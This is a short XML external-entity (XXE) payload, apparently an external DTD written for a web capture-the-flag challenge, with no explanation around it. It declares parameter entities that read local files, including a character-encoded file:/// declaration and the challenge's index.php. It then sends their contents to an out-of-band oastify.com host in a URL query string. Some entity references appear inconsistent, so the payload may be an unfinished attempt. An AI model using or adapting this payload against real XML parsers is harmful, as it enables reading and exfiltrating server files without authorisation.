<!ENTITY % test1 SYSTEM "http://187hflsw0rb1sgveu111piwcl3rwfy3n.oastify.com/?x=FLAG1;">
<!ENTITY % a "&#60;&#33;&#69;&#78;&#84;&#73;&#84;&#89;&#32;&#37;&#32;&#102;&#105;&#108;&#101;&#32;&#83;&#89;&#83;&#84;&#69;&#77;&#32;&#34;&#102;&#105;&#108;&#101;&#58;&#47;&#47;&#47;&#34;&#62;">
<!ENTITY % b SYSTEM "/challenge/web-serveur/ch29/index.php;">
<!ENTITY % test2 SYSTEM "http://187hflsw0rb1sgveu111piwcl3rwfy3n.oastify.com/?x=%FLAG2;">

%test1;
%b;
%test2;

<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://187hflsw0rb1sgveu111piwcl3rwfy3n.oastify.com/?x=%file;'>">
%abt;
%exfil;



